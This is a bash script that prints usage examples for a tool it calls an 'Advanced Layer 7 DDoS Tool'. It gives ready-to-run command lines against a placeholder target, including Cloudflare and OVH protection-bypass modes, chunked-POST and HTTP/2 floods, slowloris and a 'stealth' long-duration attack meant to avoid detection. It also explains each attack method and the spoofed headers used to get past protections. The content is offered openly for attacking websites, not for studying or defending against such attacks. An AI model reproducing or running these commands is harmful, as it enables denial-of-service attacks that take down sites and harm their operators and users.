#!/bin/bash

# Advanced Layer 7 DDoS Tool - Usage Examples
# Run from: /workspaces/ragrag/

TOOL="./target/release/stress-test"

echo "════════════════════════════════════════════════════════════════"
echo "  Advanced Layer 7 DDoS Tool - Example Commands"
echo "════════════════════════════════════════════════════════════════"
echo ""

echo "1. CLOUDFLARE BYPASS - Standard Attack"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 500 -d 120 \\"
echo "  -m mixed -p 2048 \\"
echo "  -b cloudflare \\"
echo "  --randomize-ua -P"
echo ""

echo "2. OVH BYPASS - Chunked POST Attack"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 500 -d 120 \\"
echo "  -m post-chunked -p 3000 \\"
echo "  -b ovh \\"
echo "  --randomize-ua -P -r 5"
echo ""

echo "3. MAXIMUM BANDWIDTH - HTTP/2 Enabled"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 1000 -d 300 \\"
echo "  -m post-chunked -p 5000 \\"
echo "  -b cloudflare \\"
echo "  --randomize-ua -P --http2"
echo ""

echo "4. SLOWLORIS ATTACK - Resource Exhaustion"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 800 -d 300 \\"
echo "  -m slowloris \\"
echo "  -b cloudflare \\"
echo "  -t 60"
echo ""

echo "5. STEALTH ATTACK - Long Duration, Low Detection"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 150 -d 3600 \\"
echo "  -m slowloris \\"
echo "  -b ovh \\"
echo "  --randomize-ua -t 90"
echo ""

echo "6. GENERIC BYPASS - All Features Enabled"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 600 -d 180 \\"
echo "  -m mixed -p 2048 \\"
echo "  -b generic \\"
echo "  --randomize-ua -P --http2 -r 3 -v"
echo ""

echo "7. BANDWIDTH TEST - Range Requests"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL \\"
echo "  --url http://target.com \\"
echo "  -c 400 -d 120 \\"
echo "  -m range-request -p 4000 \\"
echo "  -b cloudflare \\"
echo "  --randomize-ua -P"
echo ""

echo "8. MINIMAL TEST - Basic Setup"
echo "─────────────────────────────────────────────────────────────────"
echo "$TOOL --url http://target.com"
echo ""

echo "════════════════════════════════════════════════════════════════"
echo "PARAMETERS EXPLAINED:"
echo "════════════════════════════════════════════════════════════════"
echo ""
echo "-u, --url <URL>              Target URL (required)"
echo "-c, --connections <N>        Concurrent connections (500 recommended)"
echo "-d, --duration <N>           Test duration in seconds"
echo "-m, --method <METHOD>        Attack method (mixed = best)"
echo "-p, --payload-size <KB>      Payload size in KB"
echo "-P, --enable-pooling         Enable connection pooling (recommended)"
echo "--http2                      Use HTTP/2 multiplexing"
echo "--randomize-ua               Rotate User-Agent strings"
echo "-b, --bypass-mode <MODE>     cloudflare | ovh | generic"
echo "-r, --retries <N>            Retries on failure"
echo "-t, --timeout <N>            Request timeout seconds"
echo "-v, --verbose                Show detailed logs"
echo ""

echo "════════════════════════════════════════════════════════════════"
echo "ATTACK METHODS:"
echo "════════════════════════════════════════════════════════════════"
echo ""
echo "get-flood        → Large payload GET (bandwidth)"
echo "post-chunked     → Chunked POST (bypass-friendly)"
echo "range-request    → HTTP Range (partial content)"
echo "pipeline         → Connection pipelining"
echo "slowloris        → Slow headers (resource drain)"
echo "slow-post        → Slow body (connection hold)"
echo "large-headers    → Oversized headers"
echo "conn-reuse       → Keep-alive pooling"
echo "mixed            → Random combination (BEST)"
echo ""

echo "════════════════════════════════════════════════════════════════"
echo "BYPASS MODES:"
echo "════════════════════════════════════════════════════════════════"
echo ""
echo "generic     → X-Forwarded-For, X-Forwarded-Proto"
echo "cloudflare  → CF-Connecting-IP, X-Real-IP, CF-IPCountry"
echo "ovh         → X-Original-URL, X-Rewrite-URL"
echo ""

echo "════════════════════════════════════════════════════════════════"
